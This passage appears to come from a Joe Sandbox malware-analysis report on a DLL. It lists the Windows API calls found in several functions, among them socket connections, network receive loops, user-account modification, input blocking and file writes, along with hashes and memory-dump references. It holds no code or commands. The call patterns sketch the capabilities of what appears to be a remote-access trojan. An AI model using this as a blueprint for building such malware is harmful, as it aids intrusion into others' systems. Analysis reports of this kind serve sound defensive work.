                                                  • wsprintfA.USER32 ref: 100253BC
                                                  • strncpy.MSVCRT ref: 100253CD
                                                  • free.MSVCRT ref: 100253D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GroupsLocalUserfreemallocmbstowcsstrncpywcslenwsprintf
                                                  • String ID:
                                                  • API String ID: 4292357205-0
                                                  • Opcode ID: 3cf08a3d49de5988b493c67a44b1670e833136d1e46a5dc1f688c83686469dad
                                                  • Instruction ID: eafe78a07ed2207536c74593b08a4fb56fc39aaabfae419c660c3a3736078261
                                                  • Opcode Fuzzy Hash: 3cf08a3d49de5988b493c67a44b1670e833136d1e46a5dc1f688c83686469dad
                                                  • Instruction Fuzzy Hash: 643145701083626FD315DF24DC809EBBBE8FB88315F400A2DF99AC3281DB71DA458B96
                                                  APIs
                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 1002CAA5
                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAB9
                                                  • recv.WS2_32(?,?,00002000,00000000), ref: 1002CAD2
                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAFA
                                                  • recv.WS2_32(?,?,00002000,00000000), ref: 1002CB13
                                                  • closesocket.WS2_32 ref: 1002CB49
                                                  • closesocket.WS2_32(?), ref: 1002CB4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: closesocketrecv$select
                                                  • String ID:
                                                  • API String ID: 2008065562-0
                                                  • Opcode ID: 0b85cefd9fbbe35329ee55c3f22c5c4cce9db18045fa7969bd132ca953f7af02
                                                  • Instruction ID: 46e439923e7869da94c9f0b3855aea1b3e1c8513af54791a1ec6cd17a89e735c
                                                  • Opcode Fuzzy Hash: 0b85cefd9fbbe35329ee55c3f22c5c4cce9db18045fa7969bd132ca953f7af02
                                                  • Instruction Fuzzy Hash: 8E31C67160835D6BE335CEA4DC86FEBB7DCEB40780F810869EA45D6182D774E90487A3
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                  • #823.MFC42(000001F0), ref: 100166B0
                                                  • #823.MFC42(000001F0), ref: 100166E1
                                                    • Part of subcall function 10017D20: LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                  • #823.MFC42(000001F0), ref: 10016708
                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$ExchangeInterlocked$CloseCursorHandleLoadObjectSingleWait
                                                  • String ID:
                                                  • API String ID: 3589420723-0
                                                  • Opcode ID: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                  • Instruction ID: 712e268baaa8dd016a258d9f4d26cd7f4b70a444460d0a0c6ff612943e0d7f80
                                                  • Opcode Fuzzy Hash: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                  • Instruction Fuzzy Hash: C331B274644704ABE720CB348C92FAA77E5FB4C714F000A2DF69A9A2C1DB75F580C752
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation), ref: 1002A022
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002A029
                                                  • _ftol.MSVCRT ref: 1002A12D
                                                  • Sleep.KERNEL32(000003E8), ref: 1002A15E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcSleep_ftol
                                                  • String ID: NtQuerySystemInformation$ntdll
                                                  • API String ID: 720640769-3593917365
                                                  • Opcode ID: 87c2df69d68b346a26dfd6ce31b5de41ecb273b8ff5a55da744687a68bfed4d7
                                                  • Instruction ID: 9ecdc30b395b3de615973ea4113061162ed042f46e2595d21880a83f2e24a0e0
                                                  • Opcode Fuzzy Hash: 87c2df69d68b346a26dfd6ce31b5de41ecb273b8ff5a55da744687a68bfed4d7
                                                  • Instruction Fuzzy Hash: 8541A5B5A083059FE310DF65DC85A8BB7E8FBC8750F418E2DF589E2210EF3099548B92
                                                  APIs
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000947B
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF), ref: 10009494
                                                  • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094B7
                                                  • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094C0
                                                  • LocalAlloc.KERNEL32(00000040,-0000000A,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094CE
                                                  • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094FC
                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009524
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                                  • String ID:
                                                  • API String ID: 2793549963-0
                                                  • Opcode ID: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                  • Instruction ID: 308c1cce03677ded8cce1838fe27e550398bb3d797b3be4da8be1d4d23af97c4
                                                  • Opcode Fuzzy Hash: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                  • Instruction Fuzzy Hash: 0D3108327002145BD714DE78DC95B9AB2D6FB88621F484639FE1AD73C0DAB5A805C660
                                                  APIs
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?), ref: 1000771C
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?,?), ref: 10007792
                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,?), ref: 100077A7
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 100077C4
                                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 100077CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateFolderHandlePathPointerSpecialWrite
                                                  • String ID: p
                                                  • API String ID: 2004626570-2181537457
                                                  • Opcode ID: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                  • Instruction ID: 1e1907684de1c8bd89ee597228f05c738f3ecf463b7a0146f2a5c42f798544d2
                                                  • Opcode Fuzzy Hash: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                  • Instruction Fuzzy Hash: 6331D7756447045BD318CA28CC45FABB796FBC8320F084B2DF95A972D0DAB49E05C751
                                                  APIs
                                                    • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                    • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                    • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                    • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                    • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                  • ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                  • socket.WS2_32 ref: 10004A86
                                                  • gethostbyname.WS2_32(?), ref: 10004AA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                                  • String ID:
                                                  • API String ID: 513860241-0
                                                  • Opcode ID: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
                                                  • Instruction ID: 92d35607f8033a3118f145dcfa9d89b9a917cf27699ac872a687df5e96afb08c
                                                  • Opcode Fuzzy Hash: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
                                                  • Instruction Fuzzy Hash: 0731CEB5244301AFE310DF28CC85FDB77E4FF85318F004A1DF2999A280DBB1A4888B66
                                                  APIs
                                                  • #939.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116CA
                                                  • #800.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116DB
                                                  • #6282.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116ED
                                                  • #535.MFC42(00000030,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116F9
                                                  • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 1001173E
                                                  • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011756
                                                    • Part of subcall function 10011790: #540.MFC42 ref: 100117B7
                                                    • Part of subcall function 10011790: #2818.MFC42(00000000, %c%s,?,?), ref: 100117E0
                                                    • Part of subcall function 10011790: #2763.MFC42(00000020), ref: 100117FD
                                                    • Part of subcall function 10011790: #537.MFC42(100FACDC,00000000,00000020), ref: 10011815
                                                    • Part of subcall function 10011790: #537.MFC42(100FB4F0,100FACDC,00000000,00000020), ref: 1001182A
                                                    • Part of subcall function 10011790: #922.MFC42(?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001183B
                                                    • Part of subcall function 10011790: #922.MFC42(?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001184C
                                                    • Part of subcall function 10011790: #939.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001185B
                                                    • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011869
                                                    • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011877
                                                    • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011885
                                                    • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011893
                                                    • Part of subcall function 10011790: #535.MFC42(00000000), ref: 100118F0
                                                    • Part of subcall function 10011790: #800.MFC42(00000000), ref: 10011906
                                                  • #536.MFC42(00000000,00000001,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011766
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$#535$#537#922#939$#2763#2818#536#540#6282
                                                  • String ID:
                                                  • API String ID: 37758464-0
                                                  • Opcode ID: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
                                                  • Instruction ID: a387ab11639bd89c7a433ae959a7e4b16c1de711adbd724f1b563dcecc6c226d
                                                  • Opcode Fuzzy Hash: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
                                                  • Instruction Fuzzy Hash: 4F31B036304B509BC768DB19C980A5EB3E5FBC8660F844A2DF15A9B781CA34FD86CB51
                                                  APIs
                                                  • Sleep.KERNEL32(0000000A), ref: 1001790C
                                                  • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1001792A
                                                  • PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1001793D
                                                  • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10017959
                                                  • PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1001796C
                                                    • Part of subcall function 100172E0: WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                    • Part of subcall function 100172E0: CloseHandle.KERNEL32(?), ref: 10017316
                                                    • Part of subcall function 100172E0: #823.MFC42(00000110), ref: 1001733A
                                                  • BlockInput.USER32(?), ref: 1001797E
                                                    • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000000), ref: 10017CD7
                                                    • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000001), ref: 10017CE0
                                                  • BlockInput.USER32(00000000), ref: 100179B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: System$BlockInfoInputMessageMetricsParametersPost$#823CloseHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 3920574744-0
                                                  • Opcode ID: a7218c19c575f0fa165b1dcca2438f82306912410485c68ab7919d5f89244cd7
                                                  • Instruction ID: 7daddea43cc9a70ef573584f8d8655afaff675511c2eeb1b5977463b5a020a2f
                                                  • Opcode Fuzzy Hash: a7218c19c575f0fa165b1dcca2438f82306912410485c68ab7919d5f89244cd7
                                                  • Instruction Fuzzy Hash: 0421F63438034421DA14EA340C83FE92766EF46750F101538F65E6F1C3CDB5E88A8624
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025889
                                                  • NetUserGetInfo.NETAPI32(00000000,00000000,00000003,?), ref: 100258B8
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                    • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                  • NetUserSetInfo.NETAPI32(00000000,00000000,00000003,?,?,?), ref: 100258ED
                                                  • #825.MFC42(00000000,00000000,00000000,00000003,?,?,?), ref: 100258F5
                                                  • #825.MFC42(?,00000000,00000000,00000000,00000003,?,?,?), ref: 10025902
                                                  • NetApiBufferFree.NETAPI32(?), ref: 10025934
                                                  • LocalFree.KERNEL32(?), ref: 1002593E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825ByteCharFreeInfoMultiUserWide$#823BufferLocallstrlen
                                                  • String ID:
                                                  • API String ID: 1574401665-0
                                                  • Opcode ID: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
                                                  • Instruction ID: db542bc96f26d639f55d823ab568073f523843db7179ccf286ad23694a425397
                                                  • Opcode Fuzzy Hash: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
                                                  • Instruction Fuzzy Hash: 08217FB5608301AFD710DF68EC85E5BBAECEF94604F44042DF58597243EA74E94C8BA2
                                                  APIs
                                                  • htons.WS2_32 ref: 100234F3
                                                  • inet_addr.WS2_32(?), ref: 10023509
                                                  • inet_addr.WS2_32(?), ref: 10023527
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                  • setsockopt.WS2_32 ref: 1002355E
                                                  • connect.WS2_32(?,?,00000010), ref: 1002356E
                                                  • closesocket.WS2_32 ref: 1002357C
                                                    • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                    • Part of subcall function 100232C0: inet_ntoa.WS2_32(00000000), ref: 100232D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: inet_addr$closesocketconnectgethostbynamehtonsinet_ntoasetsockoptsocket
                                                  • String ID:
                                                  • API String ID: 1372979013-0
                                                  • Opcode ID: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
